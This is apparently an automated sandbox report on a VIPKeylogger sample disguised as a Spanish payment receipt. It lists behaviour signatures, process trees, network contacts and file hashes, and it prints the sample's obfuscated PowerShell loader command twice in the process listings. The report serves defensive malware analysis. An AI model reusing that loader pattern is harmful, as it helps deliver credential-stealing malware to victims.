Malware Analysis Report

2025-05-05 21:48

Sample ID 241129-kjh9nawjfy
Target JUSTIFICANTEPAGOFRASNOVIEMBRE2024.exe
SHA256 ebac7c8cd5045f76ed8f27f50eaa9c1734560bf4d9b398d81ab0ccd1c5af9e49
Tags
discovery execution vipkeylogger collection keylogger stealer
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

ebac7c8cd5045f76ed8f27f50eaa9c1734560bf4d9b398d81ab0ccd1c5af9e49

Threat Level: Known bad

The file JUSTIFICANTEPAGOFRASNOVIEMBRE2024.exe was found to be: Known bad.

Malicious Activity Summary

discovery execution vipkeylogger collection keylogger stealer

Vipkeylogger family

VIPKeylogger

Accesses Microsoft Outlook profiles

Looks up external IP address via web service

Legitimate hosting services abused for malware hosting/C2

Blocklisted process makes network request

Suspicious use of NtSetInformationThreadHideFromDebugger

Suspicious use of NtCreateThreadExHideFromDebugger

Browser Information Discovery

Command and Scripting Interpreter: PowerShell

System Location Discovery: System Language Discovery

Enumerates physical storage devices

Unsigned PE

Suspicious behavior: MapViewOfSection

Suspicious use of AdjustPrivilegeToken

Suspicious behavior: EnumeratesProcesses

outlook_office_path

outlook_win_path

Suspicious use of WriteProcessMemory

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-11-29 08:37

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-11-29 08:37

Reported

2024-11-29 08:40

Platform

win7-20241010-en

Max time kernel

119s

Max time network

120s

Command Line

"C:\Users\Admin\AppData\Local\Temp\JUSTIFICANTEPAGOFRASNOVIEMBRE2024.exe"

Signatures

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\JUSTIFICANTEPAGOFRASNOVIEMBRE2024.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\JUSTIFICANTEPAGOFRASNOVIEMBRE2024.exe

"C:\Users\Admin\AppData\Local\Temp\JUSTIFICANTEPAGOFRASNOVIEMBRE2024.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" -windowstyle minimized "$Studiepladsernes=Get-Content -Raw 'C:\Users\Admin\AppData\Local\Temp\Lysstraales\Genoversat\lirens\Scourged.Afl';$Viljekraftens=$Studiepladsernes.SubString(11694,3);.$Viljekraftens($Studiepladsernes)"

Network

N/A

Files

memory/2788-7-0x0000000073AC1000-0x0000000073AC2000-memory.dmp

memory/2788-8-0x0000000073AC0000-0x000000007406B000-memory.dmp

memory/2788-11-0x0000000073AC0000-0x000000007406B000-memory.dmp

memory/2788-10-0x0000000073AC0000-0x000000007406B000-memory.dmp

memory/2788-9-0x0000000073AC0000-0x000000007406B000-memory.dmp

memory/2788-12-0x0000000073AC0000-0x000000007406B000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-11-29 08:37

Reported

2024-11-29 08:40

Platform

win10v2004-20241007-en

Max time kernel

143s

Max time network

149s

Command Line

"C:\Users\Admin\AppData\Local\Temp\JUSTIFICANTEPAGOFRASNOVIEMBRE2024.exe"

Signatures

VIPKeylogger

stealer keylogger vipkeylogger

Vipkeylogger family

vipkeylogger

Accesses Microsoft Outlook profiles

collection
Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Windows\SysWOW64\msiexec.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Windows\SysWOW64\msiexec.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Windows\SysWOW64\msiexec.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A drive.google.com N/A N/A
N/A drive.google.com N/A N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A checkip.dyndns.org N/A N/A

Suspicious use of NtCreateThreadExHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A

Suspicious use of NtSetInformationThreadHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A

Browser Information Discovery

discovery

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\JUSTIFICANTEPAGOFRASNOVIEMBRE2024.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\msiexec.exe N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 33 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 34 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 35 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 36 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A

outlook_office_path

Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Windows\SysWOW64\msiexec.exe N/A

outlook_win_path

Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Windows\SysWOW64\msiexec.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\JUSTIFICANTEPAGOFRASNOVIEMBRE2024.exe

"C:\Users\Admin\AppData\Local\Temp\JUSTIFICANTEPAGOFRASNOVIEMBRE2024.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" -windowstyle minimized "$Studiepladsernes=Get-Content -Raw 'C:\Users\Admin\AppData\Local\Temp\Lysstraales\Genoversat\lirens\Scourged.Afl';$Viljekraftens=$Studiepladsernes.SubString(11694,3);.$Viljekraftens($Studiepladsernes)"

C:\Windows\SysWOW64\msiexec.exe

"C:\Windows\SysWOW64\msiexec.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 13.86.106.20.in-addr.arpa udp
US 8.8.8.8:53 14.160.190.20.in-addr.arpa udp
US 8.8.8.8:53 149.220.183.52.in-addr.arpa udp
US 8.8.8.8:53 133.211.185.52.in-addr.arpa udp
US 8.8.8.8:53 228.249.119.40.in-addr.arpa udp
US 8.8.8.8:53 drive.google.com udp
GB 142.250.180.14:443 drive.google.com tcp
US 8.8.8.8:53 c.pki.goog udp
GB 142.250.200.3:80 c.pki.goog tcp
US 8.8.8.8:53 o.pki.goog udp
GB 142.250.200.3:80 o.pki.goog tcp
US 8.8.8.8:53 drive.usercontent.google.com udp
GB 142.250.179.225:443 drive.usercontent.google.com tcp
US 8.8.8.8:53 14.180.250.142.in-addr.arpa udp
US 8.8.8.8:53 3.200.250.142.in-addr.arpa udp
US 8.8.8.8:53 225.179.250.142.in-addr.arpa udp
US 8.8.8.8:53 checkip.dyndns.org udp
BR 132.226.247.73:80 checkip.dyndns.org tcp
US 8.8.8.8:53 reallyfreegeoip.org udp
US 104.21.67.152:443 reallyfreegeoip.org tcp
US 8.8.8.8:53 73.247.226.132.in-addr.arpa udp
US 8.8.8.8:53 212.20.149.52.in-addr.arpa udp
US 8.8.8.8:53 152.67.21.104.in-addr.arpa udp
US 8.8.8.8:53 api.telegram.org udp
NL 149.154.167.220:443 api.telegram.org tcp
US 8.8.8.8:53 171.39.242.20.in-addr.arpa udp
US 8.8.8.8:53 220.167.154.149.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp

Files

memory/3800-5-0x00000000743EE000-0x00000000743EF000-memory.dmp

memory/3800-6-0x0000000003390000-0x00000000033C6000-memory.dmp

memory/3800-7-0x0000000005BE0000-0x0000000006208000-memory.dmp

memory/3800-8-0x00000000743E0000-0x0000000074B90000-memory.dmp

memory/3800-9-0x00000000743E0000-0x0000000074B90000-memory.dmp

memory/3800-10-0x00000000059B0000-0x00000000059D2000-memory.dmp

memory/3800-11-0x00000000062B0000-0x0000000006316000-memory.dmp

memory/3800-12-0x0000000006320000-0x0000000006386000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_lla3erk5.zad.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/3800-22-0x0000000006390000-0x00000000066E4000-memory.dmp

memory/3800-23-0x0000000006900000-0x000000000691E000-memory.dmp

memory/3800-24-0x00000000069E0000-0x0000000006A2C000-memory.dmp

memory/3800-25-0x0000000007940000-0x00000000079D6000-memory.dmp

memory/3800-26-0x0000000006EA0000-0x0000000006EBA000-memory.dmp

memory/3800-27-0x0000000006EF0000-0x0000000006F12000-memory.dmp

memory/3800-28-0x0000000007F90000-0x0000000008534000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Lysstraales\Genoversat\lirens\Scourged.Afl

MD5 daed86cf08d9bb9cd6ecb4738054b4bf
SHA1 dccb735db3c40e005b405719a7e7fbffbabd4266
SHA256 b2b48b891fda2d469556c1b554de00c8d6259e04749961ed80376d1f1b2976f0
SHA512 f881ca1571ba0e4a770318865d176c1cb3ec1b842df11c12935617406c27abc308c24928ec3c0c1f3fb32c8947fd796e9c118ee04b3b279da36e3ecffd711c1c

memory/3800-30-0x0000000008BC0000-0x000000000923A000-memory.dmp

memory/3800-32-0x0000000070870000-0x00000000708BC000-memory.dmp

memory/3800-42-0x0000000007DC0000-0x0000000007DDE000-memory.dmp

memory/3800-43-0x00000000743E0000-0x0000000074B90000-memory.dmp

memory/3800-31-0x0000000007D80000-0x0000000007DB2000-memory.dmp

memory/3800-44-0x0000000007DF0000-0x0000000007E93000-memory.dmp

memory/3800-45-0x00000000743E0000-0x0000000074B90000-memory.dmp

memory/3800-47-0x00000000743E0000-0x0000000074B90000-memory.dmp

memory/3800-46-0x0000000007EF0000-0x0000000007EFA000-memory.dmp

memory/3800-48-0x0000000007F30000-0x0000000007F41000-memory.dmp

memory/3800-49-0x0000000007F80000-0x0000000007F8E000-memory.dmp

memory/3800-50-0x0000000008680000-0x0000000008694000-memory.dmp

memory/3800-51-0x00000000086C0000-0x00000000086DA000-memory.dmp

memory/3800-52-0x00000000086B0000-0x00000000086B8000-memory.dmp

memory/3800-53-0x00000000086D0000-0x00000000086FA000-memory.dmp

memory/3800-54-0x0000000008700000-0x0000000008724000-memory.dmp

memory/3800-55-0x00000000743EE000-0x00000000743EF000-memory.dmp

memory/3800-56-0x00000000743E0000-0x0000000074B90000-memory.dmp

memory/3800-57-0x00000000743E0000-0x0000000074B90000-memory.dmp

memory/3800-58-0x00000000743E0000-0x0000000074B90000-memory.dmp

memory/3800-59-0x00000000743E0000-0x0000000074B90000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Lysstraales\Genoversat\lirens\Canchas.Mou

MD5 5d3d1c39210847fc1d4ae76b2272a8f4
SHA1 88b4f7bba955a4eabaffea4689806b8d409be5ee
SHA256 04588cf44f89229f0b94e58b3203909c53cfe076062c3bd1844268924c12d289
SHA512 497df70f2bdb5c64ac5ab5d06486e1241cf58a76c9c4d501682e5c659d73ddd9bac15c8be45cc5e39021cdcf98592efa1c2aa02e4d1ccc42ae5911d29aecc085

memory/3800-61-0x00000000743E0000-0x0000000074B90000-memory.dmp

memory/3800-62-0x00000000743E0000-0x0000000074B90000-memory.dmp

memory/3800-63-0x00000000743E0000-0x0000000074B90000-memory.dmp

memory/3800-65-0x00000000743E0000-0x0000000074B90000-memory.dmp

memory/3800-64-0x0000000009240000-0x000000000C369000-memory.dmp

memory/3800-66-0x00000000743E0000-0x0000000074B90000-memory.dmp

memory/3800-67-0x00000000743E0000-0x0000000074B90000-memory.dmp

memory/3800-69-0x00000000743E0000-0x0000000074B90000-memory.dmp

memory/3800-70-0x00000000743E0000-0x0000000074B90000-memory.dmp

memory/2160-83-0x0000000001100000-0x0000000002354000-memory.dmp

memory/2160-84-0x0000000001100000-0x0000000001148000-memory.dmp

memory/2160-85-0x00000000233F0000-0x000000002348C000-memory.dmp

memory/2160-87-0x0000000024030000-0x00000000241F2000-memory.dmp

memory/2160-88-0x0000000023EB0000-0x0000000023F00000-memory.dmp

memory/2160-90-0x0000000024200000-0x0000000024292000-memory.dmp

memory/2160-91-0x0000000023F50000-0x0000000023F5A000-memory.dmp